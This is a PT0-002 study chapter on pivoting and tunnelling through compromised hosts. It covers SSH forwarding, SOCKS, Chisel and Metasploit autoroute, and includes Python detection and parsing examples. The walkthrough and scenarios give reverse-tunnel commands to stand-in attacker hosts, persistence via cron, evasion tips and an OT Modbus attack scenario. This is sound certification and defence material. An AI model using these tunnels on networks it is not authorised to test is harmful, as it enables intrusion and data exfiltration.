PT0-002 | Chapter 28 of 104 | Objective 3.4

Pivoting and Tunnelling Through Networks

This chapter covers pivoting and tunnelling techniques essential for post-exploitation in penetration testing. For the PT0-002 exam, understanding how to pivot through compromised hosts to access otherwise unreachable networks is critical, as approximately 10-15% of exam questions touch on lateral movement, pivoting, or tunnelling. You will learn the mechanisms behind SSH tunnelling, port forwarding, SOCKS proxies, and tools like Chisel and Metasploit's pivot module, along with detection and mitigation strategies.

25 min read
Intermediate
Updated May 31, 2026

Pivoting as a Secret Tunnel Network

Imagine a penetration tester is a spy who has compromised a single computer in a secure office building. This computer is like a desk in a cubicle farm with a direct phone line to the outside (the internet) but no direct access to the CEO's office (the internal database). The spy needs to reach the CEO's safe. She can't walk there because security guards (firewalls) block the way. Instead, she uses the compromised computer to build a hidden tunnel—a physical passage through the ventilation system. She crawls through the vents (encrypted traffic) from the cubicle to the CEO's office, bypassing the guards. Once inside, she can open the safe and relay documents back through the vent to her original desk, which then sends them to her handler. In networking terms, the compromised host (cubicle) becomes a pivot point. The vent is an SSH tunnel or a SOCKS proxy. The spy's ability to move through the vent without being seen is akin to using encrypted tunnels to bypass network segmentation. The key mechanic: the spy never leaves the vent; she uses it to forward traffic from her original desk to the CEO's office and back. Similarly, a pivot host forwards packets from the attacker's machine to the target network, making it appear as if the traffic originates from the compromised host, not the attacker.

How It Actually Works

What is Pivoting and Why Does It Exist?

Pivoting is the technique of using a compromised host (the pivot point) to access other systems that are not directly reachable from the attacker's machine. In a typical penetration test, the attacker's machine is on an external network, while the target internal network is segmented by firewalls, NAT, or VLANs. After compromising a single host (often via phishing or an exposed service), the attacker can use that host as a stepping stone to reach deeper into the network.

Tunnelling is the method of encapsulating traffic from one network protocol inside another to bypass network controls. For example, SSH tunnelling encapsulates arbitrary TCP traffic within an SSH session, which is often allowed through firewalls because SSH (port 22) is commonly permitted for remote administration.

How Pivoting Works Internally

A pivot typically involves three machines: the attacker's machine (A), the compromised host (B, also called the pivot or foothold), and the target internal host (C). The attacker cannot directly reach C due to network segmentation. However, B can reach C because they are on the same internal network. The attacker establishes a tunnel from A to B, then uses B to forward traffic to C.

Consider a scenario where the attacker has a reverse shell on B. From A, the attacker can run commands on B. To access a web server on C (192.168.1.100:80), the attacker can set up local port forwarding on A via SSH to B, mapping a local port (e.g., 8080) to C:80. The command:

ssh -L 8080:192.168.1.100:80 user@B

When the attacker opens a browser to http://localhost:8080, the SSH client on A listens on port 8080. Any connection to that port is encrypted and sent over the SSH tunnel to B. The SSH server on B decrypts the traffic and opens a new TCP connection to 192.168.1.100:80. The response flows back through the same tunnel. To C, the connection appears to originate from B's IP address, not A's.

Key Components, Values, Defaults, and Timers

SSH Tunnelling: Uses the SSH protocol (RFC 4251). Default port 22. Three types:

Local port forwarding (-L): Listens on a local port and forwards to a remote destination.

Remote port forwarding (-R): Listens on a remote port and forwards to a local destination.

Dynamic port forwarding (-D): Creates a SOCKS proxy on a local port.

SOCKS Proxy: A protocol (RFC 1928) that allows clients to connect to arbitrary TCP/UDP ports through a proxy server. SOCKS5 supports authentication and UDP. Default port 1080.

Chisel: A fast TCP/UDP tunnel over HTTP, using SSH-like encryption. It can bypass firewalls that block SSH. Default port 8080 for the server.

Metasploit pivot: Uses the route add command or the autoroute post-exploitation module to add routes through a compromised session. The session acts as a proxy.

Timers: SSH tunnels have no fixed timeout but can be kept alive with ServerAliveInterval (default 0, disabled). TCP keepalive timers default to 2 hours on many systems. Firewalls often have idle timeouts (e.g., 300 seconds for stateful inspection).
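The SOCKS5 exchange described above (RFC 1928) happens between the application (a browser, proxychains) and the proxy listener, so it shows up in a capture whenever that listener is exposed on the network or the capture is taken on the host. The decoder below is an added example, not code from this chapter; its sample payloads are constructed, not captured.

```python
"""Decode a SOCKS5 client greeting and request (RFC 1928) from raw bytes.

Added example, not code from the original chapter. A SOCKS5 client opens
with VER=0x05 and a method list, then sends VER CMD RSV ATYP DST.ADDR
DST.PORT; recognising that sequence on port 1080 (or any other port) is how
an analyst spots a dynamic-forwarding proxy in traffic. Samples are constructed.
"""
import socket
import struct
from typing import Dict, Tuple

METHODS = {0x00: "no auth", 0x02: "username/password", 0xFF: "no acceptable"}
COMMANDS = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP ASSOCIATE"}


def parse_greeting(data: bytes) -> Tuple[Dict, int]:
    """Return (greeting fields, bytes consumed); ValueError if not a SOCKS5 greeting."""
    if len(data) < 2 or data[0] != 0x05:
        raise ValueError("not a SOCKS5 greeting")
    n = data[1]
    if n == 0 or len(data) < 2 + n:
        raise ValueError("bad or truncated method list")
    methods = [METHODS.get(m, f"0x{m:02x}") for m in data[2:2 + n]]
    return {"version": 5, "methods": methods}, 2 + n


def parse_request(data: bytes) -> Tuple[Dict, int]:
    """Decode VER CMD RSV ATYP DST.ADDR DST.PORT for IPv4, domain-name and IPv6 ATYPs."""
    if len(data) < 4 or data[0] != 0x05:
        raise ValueError("not a SOCKS5 request")
    cmd, rsv, atyp, pos = data[1], data[2], data[3], 4
    if rsv != 0x00 or cmd not in COMMANDS:
        raise ValueError("malformed request")
    if atyp == 0x01:
        alen, addr_type = 4, socket.AF_INET
    elif atyp == 0x04:
        alen, addr_type = 16, socket.AF_INET6
    elif atyp == 0x03:                      # domain name: one length byte, then the name
        if len(data) < 5:
            raise ValueError("truncated domain length")
        alen, addr_type, pos = data[4], None, 5
    else:
        raise ValueError(f"unknown ATYP 0x{atyp:02x}")
    if len(data) < pos + alen + 2:          # address plus 2-byte port must be present
        raise ValueError("truncated request")
    raw = data[pos:pos + alen]
    addr = raw.decode("ascii") if addr_type is None else socket.inet_ntop(addr_type, raw)
    port = struct.unpack("!H", data[pos + alen:pos + alen + 2])[0]
    return {"command": COMMANDS[cmd], "address": addr, "port": port}, pos + alen + 2


def classify_client_stream(data: bytes) -> str:
    """Summarise the client side of a reassembled TCP stream, or '' if it is not SOCKS5."""
    try:
        greeting, used = parse_greeting(data)
        request, _ = parse_request(data[used:])
    except ValueError:
        return ""
    return (f"SOCKS5 {request['command']} to {request['address']}:{request['port']} "
            f"(auth offered: {', '.join(greeting['methods'])})")


# constructed samples: a browser pointed at a SOCKS5 proxy asking for
# 192.168.1.100:80, a UDP ASSOCIATE for a domain name, and an IPv6 CONNECT
SAMPLE_CONNECT = (b"\x05\x01\x00"                         # greeting: 1 method, no auth
                  + b"\x05\x01\x00\x01" + socket.inet_aton("192.168.1.100")
                  + struct.pack("!H", 80))
SAMPLE_UDP = (b"\x05\x02\x00\x02"                           # offers no-auth and user/pass
              + b"\x05\x03\x00\x03" + bytes([len(b"dns.internal")]) + b"dns.internal"
              + struct.pack("!H", 53))
SAMPLE_V6 = (b"\x05\x01\x00" + b"\x05\x01\x00\x04"
             + socket.inet_pton(socket.AF_INET6, "fd00::1") + struct.pack("!H", 443))

if __name__ == "__main__":
    for sample in (SAMPLE_CONNECT, SAMPLE_UDP, SAMPLE_V6, b"GET / HTTP/1.1\r\n"):
        print(repr(sample[:8]), "->", classify_client_stream(sample) or "not SOCKS5")
```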

Configuration and Verification Commands

SSH Local Port Forwarding (A -> B -> C):

On attacker machine A:

ssh -L 8080:192.168.1.100:80 user@B

Verify with:

netstat -tlnp | grep 8080

You should see the ssh client process listening on 127.0.0.1:8080 (on A it is the client that owns the listener, not sshd).

SSH Remote Port Forwarding (B -> A -> C):

On attacker A, start SSH with remote forwarding:

ssh -R 8888:192.168.1.100:80 user@B

Now on B, connecting to localhost:8888 will forward to A, which then connects to C:80. By default, sshd on B binds the forwarded port to loopback only. To allow other hosts on B's network to use the tunnel, use -R 0.0.0.0:8888:192.168.1.100:80 and set GatewayPorts yes in the sshd config on B (the side that owns the listener).

Dynamic Port Forwarding (SOCKS Proxy):

ssh -D 1080 user@B

Then configure your browser or tool (e.g., proxychains) to use SOCKS5 proxy at 127.0.0.1:1080. All traffic through the proxy is tunnelled via B.
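The three spec forms above (-L, -R, -D, including the bind-address form) are where most -L/-R confusion starts. The parser below is an added example, not code from this chapter: it takes a logged ssh command line, such as one recorded by process auditing, and reports which machine opens the listener and from whose perspective the target is resolved. It assumes OpenSSH's documented spec grammar and the labels "attacker" for the ssh client side and "pivot" for the sshd side.

```python
"""Parse OpenSSH -L/-R/-D forwarding specs and report which side listens.

Added example, not code from the original chapter. It assumes the spec
grammar OpenSSH documents:
    -L [bind_address:]port:host:hostport
    -R [bind_address:]port:host:hostport
    -D [bind_address:]port
Bracketed IPv6 literals are not handled (left out for brevity).
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional

LOOPBACK = {None, "localhost", "127.0.0.1", "::1"}
ALL_IFACES = {"", "*", "0.0.0.0", "::"}


@dataclass
class Forward:
    kind: str                        # "local", "remote" or "dynamic"
    listen_side: str                 # machine that opens the listening socket
    bind_address: str
    listen_port: int
    target: Optional[str]            # "host:hostport"; None for a SOCKS proxy
    target_seen_from: Optional[str]  # machine that resolves and connects to target
    exposed: bool                    # listener reachable from other hosts?
    needs_gateway_ports: bool        # -R exposure also needs sshd GatewayPorts yes


def parse_forward(flag: str, spec: str, client: str = "attacker",
                  server: str = "pivot") -> Forward:
    """client = machine running ssh, server = machine running sshd."""
    parts = spec.split(":")
    target = None
    if flag == "D" and len(parts) in (1, 2):
        bind = parts[0] if len(parts) == 2 else None
        port = int(parts[-1])
    elif flag in ("L", "R") and len(parts) in (3, 4):
        bind = parts[0] if len(parts) == 4 else None
        port, host, hostport = parts[-3:]
        port, target = int(port), f"{host}:{hostport}"
    else:
        raise ValueError(f"bad -{flag} spec: {spec}")
    exposed = bind not in LOOPBACK       # "", "*", 0.0.0.0 or a real address
    bind_str = ("127.0.0.1" if bind in LOOPBACK
                else "0.0.0.0" if bind in ALL_IFACES else bind)
    if flag == "R":
        # -R: the sshd side listens; the target is reached from the ssh client side
        return Forward("remote", server, bind_str, port, target, client, exposed, exposed)
    # -L/-D: the ssh client side listens; -L targets are reached from the sshd side
    kind = "local" if flag == "L" else "dynamic"
    return Forward(kind, client, bind_str, port, target,
                   server if flag == "L" else None, exposed, False)


def parse_ssh_command(cmdline: str, client: str = "attacker",
                      server: str = "pivot") -> List[Forward]:
    """Extract every forward from a logged ssh command line (e.g. from process auditing)."""
    argv, forwards, i = shlex.split(cmdline), [], 1
    while i < len(argv):
        arg = argv[i]
        if arg[:2] in ("-L", "-R", "-D"):          # both "-L spec" and "-Lspec" forms
            spec = arg[2:] or argv[i + 1]
            i += 1 if arg[2:] else 2
            forwards.append(parse_forward(arg[1], spec, client, server))
            continue
        i += 1
    return forwards


def describe(f: Forward) -> str:
    reach = "reachable from other hosts" if f.exposed else "loopback only"
    where = f"{f.listen_side}:{f.listen_port} (bind {f.bind_address}, {reach})"
    if f.kind == "dynamic":
        return f"SOCKS proxy on {where}; destination chosen per connection, reached from the sshd side"
    note = "; remote sshd needs GatewayPorts yes" if f.needs_gateway_ports else ""
    return f"{f.kind} forward on {where} -> {f.target} as seen from {f.target_seen_from}{note}"


if __name__ == "__main__":
    for cmd in ("ssh -L 8080:192.168.1.100:80 user@B",
                "ssh -R 0.0.0.0:8888:192.168.1.100:80 user@B",
                "ssh -N -f -D 1080 user@B"):
        for fwd in parse_ssh_command(cmd):
            print(cmd, "=>", describe(fwd))
```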

Using Chisel:

On the attacker (server):

chisel server --port 8080 --reverse

On the compromised host (client):

chisel client <attacker_ip>:8080 R:8000:192.168.1.100:80

This creates a reverse tunnel: connections to attacker's port 8000 are forwarded to C:80 via the client.

Metasploit Pivot:

After gaining a Meterpreter session on B:

meterpreter > run autoroute -s 192.168.1.0/24

Then background the session and use route to see the added route. Now you can use auxiliary modules or exploit modules against the internal network, and traffic will go through the session.

How Pivoting Interacts with Related Technologies

Firewalls: Pivoting relies on the fact that the compromised host can communicate with internal targets. Firewalls with stateful inspection may allow the return traffic because it matches an existing connection. Deep packet inspection (DPI) can detect tunnelling protocols (e.g., SSH on non-standard ports) and block them.

NAT: If the compromised host is behind NAT, reverse tunnels (where the host initiates the connection to the attacker) are often necessary because the attacker cannot directly connect to the host. This is common in post-exploitation where the host is on a private network.

Network Segmentation: VLANs, ACLs, and micro-segmentation limit pivoting. If the compromised host is in a DMZ with strict egress rules, it may not be able to reach internal hosts. The attacker must then find another way, such as using multiple hops (chained pivots) or exploiting trust relationships.

Endpoint Detection and Response (EDR): Modern EDR tools can detect unusual SSH processes, port forwarding, or unexpected outbound connections. They may flag the creation of a SOCKS proxy or the use of tunnelling tools like Chisel. Attackers often use obfuscation, such as tunnelling over HTTPS (e.g., using socat or stunnel) or using legitimate tools like netsh port forwarding on Windows.

Walk-Through

1. Compromise the Initial Foothold

The first step is to gain access to a host within the target network. This is typically achieved through phishing, exploiting a vulnerability in an internet-facing service, or using stolen credentials. The compromised host becomes the pivot point. At this stage, the attacker has a shell or Meterpreter session on the host. The host must have network connectivity to both the attacker (outbound) and the internal target (inbound). The attacker notes the host's IP address, network interfaces, and routing table to understand which internal networks are reachable. For example, `ipconfig` on Windows or `ip a` on Linux reveals local IPs and gateway.

2. Assess Network Segmentation and Routes

The attacker maps the internal network from the pivot host. Using commands like `arp -a`, `netstat -rn`, and `route print`, the attacker discovers adjacent subnets and the default gateway. They may also perform port scanning from the pivot host (e.g., using `nmap` via a proxy) to identify live hosts and services. This step determines which targets are accessible and what services are running. The attacker looks for segmentation: if the pivot host can reach 10.0.0.0/8 but not 172.16.0.0/12, they may need to compromise another host in the 172.16.x.x network to pivot further.

3. Set Up Tunnelling Mechanism

Based on the network layout and firewall rules, the attacker chooses a tunnelling method. If SSH is allowed outbound, they can set up a reverse SSH tunnel from the pivot to the attacker's machine. If SSH is blocked, they might use Chisel over HTTP/HTTPS, or set up a SOCKS proxy using Meterpreter's `portfwd` or `auxiliary/server/socks_proxy`. The attacker ensures the tunnel is encrypted to evade detection. For example, running `ssh -R 4444:127.0.0.1:9999 attacker.com` on the pivot creates a reverse tunnel where connections to the attacker's port 4444 are forwarded to the pivot's localhost:9999 (which could be a service on the internal network).

4. Route Traffic Through the Pivot

The attacker configures their local toolchain to use the tunnel. For SOCKS proxies, they set environment variables (e.g., `export http_proxy=socks5://127.0.0.1:1080`) or use tools like `proxychains` to force all traffic through the proxy. For port forwarding, they simply connect to local ports. In Metasploit, they add routes with `route add 10.0.0.0/8 1` (where 1 is the session ID) so that modules targeting that subnet automatically use the session. The attacker then runs scans or exploits against internal targets. The tunnel transparently forwards packets, and the target sees the pivot's IP as the source.

5. Maintain Access and Chain Pivots

The attacker may need to pivot through multiple hosts to reach a high-value target. This is called chaining. For example, from host A, they tunnel to host B, then from B to C. Each hop adds latency and complexity. Tools like `ssh -J` (jump host) or chaining SOCKS proxies can be used. The attacker must also maintain persistence on each pivot host to avoid losing access if a session dies. They may set up cron jobs or scheduled tasks to re-establish tunnels. Additionally, they monitor for detection: unexpected traffic patterns, new listening ports, or unusual processes. If a tunnel is broken, they quickly re-establish it using a fallback method (e.g., if SSH fails, switch to Chisel).

What This Looks Like on the Job

Enterprise Scenario 1: PCI-Compliant Network Segmentation

A penetration tester is assessing a financial institution that has a strict PCI-DSS compliant network. The corporate network (192.168.1.0/24) is isolated from the cardholder data environment (CDE) (10.0.0.0/8) by a pair of firewalls. The tester successfully phishes an employee in the corporate network, gaining a foothold on a Windows workstation (192.168.1.50). From there, they discover that the workstation can reach a jump box (10.0.0.10) via RDP (port 3389) because IT administrators need to manage the CDE. The tester uses ssh -L 13389:10.0.0.10:3389 user@192.168.1.50 to tunnel RDP through the pivot. They then connect to localhost:13389 with an RDP client, using stolen credentials, and gain access to the jump box. From the jump box, they can reach the database server (10.0.0.100). They set up a second tunnel from the jump box to the database using Meterpreter's portfwd to forward port 1433 (MSSQL) back to their machine. This chained pivot demonstrates how a single foothold can lead to critical assets. In production, such tunnels are often detected by network monitoring tools that see unusual RDP traffic from a workstation to multiple internal hosts, or by endpoint protection that flags the SSH client on a non-admin machine.

Enterprise Scenario 2: Cloud Environment Pivoting

In a cloud penetration test (AWS, Azure, GCP), the attacker compromises a web server in a public subnet. The web server has a public IP and is accessible from the internet. However, the database server is in a private subnet with no direct internet access. The web server can reach the database server via a VPC peering connection. The attacker uses a reverse SSH tunnel from the web server to their own cloud instance (attacker's C2). They configure the tunnel to forward local port 3306 (MySQL) on the web server to the attacker's port 33060. Now the attacker can connect to their own localhost:33060 and it goes through the web server to the database. This bypasses the security group that only allows the web server to access the database. In production, cloud security groups and network ACLs are designed to prevent such pivoting, but if the web server is compromised, the attacker inherits its network permissions. To mitigate, organizations use host-based firewalls (e.g., iptables) on the web server to restrict outbound connections, and implement VPC endpoints or private link to avoid routing through a single host.

Scenario 3: OT/ICS Network Pivoting

In an operational technology (OT) environment, the IT network and OT network are air-gapped. However, a historian server sits in a DMZ and has connections to both networks. The attacker compromises the historian via an unpatched web interface. From the historian, they can reach the OT network's PLCs (programmable logic controllers). The attacker uses Chisel to tunnel Modbus traffic (port 502) over HTTPS, because OT network firewalls often allow HTTPS for software updates. They set up a Chisel server on their C2 and a client on the historian, creating a reverse tunnel from the OT network to the C2. They then use a Modbus client on the C2 to send commands to the PLCs, potentially causing physical damage. In production, OT networks should have deep packet inspection that can detect Modbus over HTTPS anomalies, but many legacy systems lack this capability. The key takeaway is that pivoting in OT environments is extremely dangerous and highlights the need for strict network segmentation and host hardening.

How PT0-002 Actually Tests This

What PT0-002 Tests on Pivoting and Tunnelling

The PT0-002 exam objectives under 3.4 (Pivoting and Tunnelling) focus on the ability to identify and execute pivoting techniques using common tools. You should know:

The difference between local, remote, and dynamic port forwarding in SSH.

How to use Metasploit's route add and autoroute to pivot through a session.

The purpose of SOCKS proxies and how to configure them.

Tools like Chisel, Proxychains, and SSH for tunnelling.

Detection and mitigation strategies (e.g., network segmentation, egress filtering).

Common Wrong Answers and Why Candidates Choose Them

1. Confusing local and remote forwarding: Candidates often mix up -L and -R. They might think -L forwards from remote to local, or vice versa. The key is: -L listens on the LOCAL machine; -R listens on the REMOTE machine. A common exam question: "You have a shell on a host behind NAT. Which technique allows you to access a service on the internal network?" The wrong answer is often "local port forwarding" because the candidate thinks they need to forward a local port to the internal service. But since the host is behind NAT and cannot be reached directly, you need a reverse tunnel (-R) where the compromised host initiates the connection to your machine.

2. Thinking pivoting is only for network scanning: Some candidates believe pivoting is only used for port scanning. In reality, pivoting is used for any TCP/UDP communication, including exploitation, data exfiltration, and interactive access.

3. Assuming all tunnels are encrypted: While SSH tunnels are encrypted, some tools like netcat or socat can create plaintext tunnels. The exam may test that encryption is not inherent to all tunnelling methods.

4. Misunderstanding SOCKS proxy vs. port forwarding: SOCKS proxies allow dynamic multi-port forwarding, while port forwarding is static. A question might ask: "Which technique allows you to browse multiple websites through a pivot without configuring each port?" The answer is SOCKS proxy, not port forwarding.

Specific Numbers, Values, and Terms to Memorize

SSH default port: 22

SOCKS default port: 1080

Chisel default port: 8080

Metasploit autoroute command syntax: run autoroute -s <subnet>

proxychains configuration file: /etc/proxychains.conf (or proxychains4.conf)

The -N flag in SSH: do not execute a remote command (useful for port forwarding only).

The -f flag: background SSH after authentication.

Edge Cases and Exceptions

Double pivoting: The exam may present a scenario where you need to pivot through two hosts. You need to chain tunnels. For example, use ssh -J (jump host) or set up a SOCKS proxy on the first pivot and then another on the second.

UDP tunnelling: SOCKS5 supports UDP, but many tools only handle TCP. The exam may ask how to tunnel DNS (UDP) through a pivot. Answer: use a SOCKS5 proxy that supports UDP, or encapsulate UDP in TCP (e.g., using socat).

Firewall evasion: If SSH is blocked, you might use HTTP tunnelling (e.g., Chisel, httptunnel) or DNS tunnelling (e.g., iodine). The exam may ask which protocol is most likely to be allowed outbound (answer: DNS or HTTPS).

How to Eliminate Wrong Answers

Read the question carefully: Is the pivot host behind NAT? Then you need a reverse tunnel. Is the goal to access multiple ports? Use a SOCKS proxy. Does the question mention "encrypted"? SSH and Chisel are encrypted; raw netcat is not. Does it mention "dynamic"? That refers to SOCKS. Use the underlying mechanism: if the attacker's machine initiates the connection, it's local forwarding; if the compromised host initiates, it's remote forwarding.

Key Takeaways

Pivoting uses a compromised host to access networks not directly reachable from the attacker.

SSH local port forwarding (-L) listens on the attacker's machine; remote forwarding (-R) listens on the pivot.

Dynamic port forwarding (-D) creates a SOCKS proxy on the attacker's machine.

Metasploit's `route add` or `autoroute` module enables pivoting through a Meterpreter session.

Chisel is an HTTP-based tunnelling tool that can bypass firewalls blocking SSH.

Proxychains forces any TCP application to use a SOCKS proxy for pivoting.

Detection methods include monitoring for unusual outbound SSH, non-standard ports, and unexpected proxy services.

Mitigation includes strict egress filtering, network segmentation, and host-based firewalls.

Easy to Mix Up

These come up on the exam all the time. Here's how to tell them apart.

SSH Local Port Forwarding (-L)

Listens on the local machine (attacker) and forwards to a destination reachable from the remote host.

Used when the attacker can initiate the SSH connection to the pivot.

Syntax: ssh -L [local_port]:[target_host]:[target_port] user@pivot

The target host is specified from the pivot's perspective.

Common for accessing internal services when the pivot is reachable from the attacker.

SSH Remote Port Forwarding (-R)

Listens on the remote machine (pivot) and forwards to a destination reachable from the local machine (attacker).

Used when the pivot is behind NAT and cannot be directly connected to; the pivot initiates the SSH connection.

Syntax: ssh -R [remote_port]:[target_host]:[target_port] user@attacker

The target host is specified from the attacker's perspective.

Common for exfiltration or when the pivot can only make outbound connections.

SOCKS Proxy (Dynamic Forwarding)

Creates a SOCKS proxy on a local port that can handle multiple destinations dynamically.

Syntax: ssh -D [local_port] user@pivot

Allows any TCP connection through the proxy (e.g., web browsing, FTP).

Applications must be configured to use the SOCKS proxy (e.g., via proxychains).

More flexible but may have higher overhead.

Port Forwarding (Static Forwarding)

Forwards a single local port to a single remote destination.

Syntax: ssh -L [local_port]:[target_host]:[target_port] user@pivot

Fixed mapping; only one service per command.

No application configuration needed; just connect to localhost.

Simpler and faster for specific tasks.

Chisel

Tunnels over HTTP/HTTPS, making it harder to block than SSH on port 22.

Uses a client-server model with a single binary; no SSH server required.

Supports reverse and forward tunnels, as well as SOCKS5 proxy.

Default port 8080 (HTTP). Can be run on any port.

Encrypted using SSH-like crypto (Chisel uses Go's crypto library).

SSH Tunnelling

Tunnels over SSH protocol, typically on port 22.

Requires SSH server on the pivot (or client on the attacker for reverse).

Supports local, remote, and dynamic forwarding natively.

Default port 22. Often blocked by egress filters.

Encrypted by default; strong authentication options.

Watch Out for These

Mistake

Pivoting and tunnelling are the same thing.

Correct

Pivoting is the act of using a compromised host to access otherwise unreachable networks; tunnelling is a method to achieve pivoting by encapsulating traffic. Tunnelling can also be used for other purposes like bypassing firewalls without pivoting.

Mistake

SSH tunnels are always allowed through firewalls.

Correct

Many organizations block outbound SSH (port 22) to prevent tunnelling. Attackers then use SSH on port 443 or use other protocols like HTTPS (Chisel) or DNS.

Mistake

You can only pivot through one host at a time.

Correct

Pivoting can be chained through multiple hosts. For example, through host A to host B to host C. Tools like SSH jump hosts (`-J`) or nested SOCKS proxies support this.

Mistake

Metasploit's autoroute automatically tunnels all traffic.

Correct

Autoroute only adds routes within Metasploit's context. It does not create a system-wide proxy. You need to use `portfwd` or a SOCKS proxy module to tunnel traffic from external tools.

Mistake

Proxychains works with all applications.

Correct

Proxychains only works with applications that use TCP and resolve DNS through the proxy. Some applications (e.g., those using raw sockets or UDP) may not work. Proxychains4 (proxychains-ng) improves support.


Frequently Asked Questions

What is the difference between local and remote port forwarding in SSH?

Local port forwarding (-L) listens on your local machine and forwards connections to a destination reachable from the remote host. You use it when you can SSH to the remote host. Remote port forwarding (-R) listens on the remote host and forwards connections to a destination reachable from your local machine. You use it when the remote host is behind NAT and cannot be directly connected to; the remote host initiates the SSH connection. For example, `ssh -L 8080:internal:80 user@pivot` forwards localhost:8080 to internal:80 via pivot. `ssh -R 8080:localhost:80 user@attacker`, run on the pivot, opens port 8080 on the attacker's machine and forwards connections to it to the pivot's localhost:80.

How do I pivot through multiple hosts?

You can chain pivots by using a SOCKS proxy on the first pivot and then connecting to the second pivot through that proxy, or by using SSH jump hosts with the `-J` flag. For example: `ssh -J user@pivot1 user@pivot2` creates a connection to pivot2 via pivot1. Alternatively, set up a SOCKS proxy on pivot1 (`ssh -D 1080 user@pivot1`), then from your machine run `proxychains ssh user@pivot2` so that the second SSH connection is routed through the proxy on pivot1. You can also nest tunnels by forwarding ports from one pivot to another.

What tools can I use for tunnelling when SSH is blocked?

When SSH is blocked, you can use tools like Chisel (HTTP tunnelling), socat (to encapsulate traffic), stunnel (SSL tunnelling), or even DNS tunnelling with iodine. Chisel is particularly popular because it uses HTTP/HTTPS, which is often allowed outbound. You can also use Metasploit's `portfwd` over a reverse HTTP or HTTPS payload if you have a Meterpreter session.

How does proxychains work and how do I configure it?

Proxychains intercepts network calls from an application and routes them through a proxy chain (e.g., SOCKS5). It uses LD_PRELOAD to hook socket functions. Configuration is in `/etc/proxychains.conf` (or `proxychains4.conf`). You specify the proxy type (socks4, socks5, http) and address. For example: `socks5 127.0.0.1 1080`. Then run `proxychains nmap -sT 10.0.0.1`. Proxychains forces all TCP connections through the proxy. Note: it does not work with UDP or raw sockets by default.

What is the difference between a SOCKS proxy and a VPN for pivoting?

A SOCKS proxy operates at layer 5 (session) and forwards individual TCP connections. It does not provide full network-layer access; only applications configured to use the proxy can tunnel. A VPN (e.g., OpenVPN) creates a virtual network interface at layer 3, routing all IP traffic from the host through the tunnel. For pivoting, a SOCKS proxy is lighter and easier to set up from a compromised host, but a VPN provides full network access including UDP and non-TCP protocols. However, setting up a VPN on a compromised host is more complex and may be detected.

How can I detect pivoting on my network?

Detection methods include: monitoring for outbound SSH connections from non-admin workstations; looking for SSH on non-standard ports; detecting the presence of tunnelling tools (Chisel, socat) via file integrity monitoring or process lists; analyzing network flows for unusual patterns (e.g., a workstation connecting to many internal hosts on various ports); and using deep packet inspection to identify encapsulated traffic (e.g., HTTP with non-HTTP payloads). Endpoint detection and response (EDR) solutions can also flag the creation of proxy services or port forwarding rules.
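As an added example (not code from this chapter), the detector below applies three of the checks just listed to constructed connection records: outbound SSH from an ordinary workstation, an SSH banner on a non-standard port, and one source fanning out to many internal hosts. The record shape, address ranges and admin allow-list are assumptions, not any particular sensor's schema.

```python
"""Flag pivoting indicators in connection records.

Added example, not code from the original chapter. Records are constructed;
the (src, dst, dport, app) shape and the address ranges are assumptions.
"app" is the protocol a flow exporter or NDR sensor identified from the
payload (so "ssh" on port 443 means an SSH banner where TLS was expected).
"""
import ipaddress
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

WORKSTATIONS = ipaddress.ip_network("192.168.1.0/24")     # assumed user VLAN
INTERNAL = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
ADMIN_HOSTS = {"192.168.1.10"}                             # assumed: allowed to SSH out
FANOUT_THRESHOLD = 5   # distinct internal hosts one source must touch before alerting

Flow = Tuple[str, str, int, str]   # (src, dst, dport, app)

# constructed sample: a phished workstation (192.168.1.50) tunnelling out over
# SSH and probing the 10.0.0.0/8 network, plus an SSH session hidden on 443
SAMPLE_FLOWS: List[Flow] = [
    ("192.168.1.50", "203.0.113.7", 22, "ssh"),
    ("192.168.1.10", "203.0.113.7", 22, "ssh"),      # admin host, expected
    ("192.168.1.50", "10.0.0.10", 3389, "rdp"),
    ("192.168.1.50", "10.0.0.11", 445, "smb"),
    ("192.168.1.50", "10.0.0.12", 22, "ssh"),        # internal ssh: not egress
    ("192.168.1.50", "10.0.0.13", 80, "http"),
    ("192.168.1.50", "10.0.0.14", 1433, "mssql"),
    ("192.168.1.50", "10.0.0.15", 8080, "http"),
    ("192.168.1.77", "198.51.100.9", 443, "ssh"),    # SSH banner where TLS belongs
    ("192.168.1.60", "10.0.0.10", 3389, "rdp"),      # one host, one destination
]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def detect_pivoting(flows: Iterable[Flow]) -> List[Dict]:
    """Return one alert dict per rule hit; fan-out is evaluated after all flows are seen."""
    alerts: List[Dict] = []
    fanout: Dict[str, set] = defaultdict(set)
    for src, dst, dport, app in flows:
        egress = not is_internal(dst)
        if (app == "ssh" and egress and src not in ADMIN_HOSTS
                and ipaddress.ip_address(src) in WORKSTATIONS):
            alerts.append({"rule": "outbound-ssh-from-workstation", "src": src,
                           "dst": f"{dst}:{dport}"})
        if app == "ssh" and dport != 22:
            alerts.append({"rule": "ssh-on-nonstandard-port", "src": src,
                           "dst": f"{dst}:{dport}"})
        if not egress and src != dst:
            fanout[src].add(dst)
    for src, hosts in fanout.items():
        if len(hosts) >= FANOUT_THRESHOLD:
            alerts.append({"rule": "internal-fanout", "src": src, "hosts": len(hosts)})
    return alerts


def alert_rules_by_source(alerts: List[Dict]) -> Dict[str, List[str]]:
    """Group rule names by source address, in the order the alerts were raised."""
    grouped: Dict[str, List[str]] = defaultdict(list)
    for alert in alerts:
        grouped[alert["src"]].append(alert["rule"])
    return dict(grouped)


if __name__ == "__main__":
    for alert in detect_pivoting(SAMPLE_FLOWS):
        print(alert)
```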

What is the purpose of the `-N` flag in SSH tunnelling?

The `-N` flag tells SSH not to execute any remote command. It is used when you only want to set up port forwarding and do not need an interactive shell. This is useful for background tunnels where you just want the forwarding to happen. For example: `ssh -N -L 8080:localhost:80 user@pivot`. This reduces overhead and prevents unintended command execution.

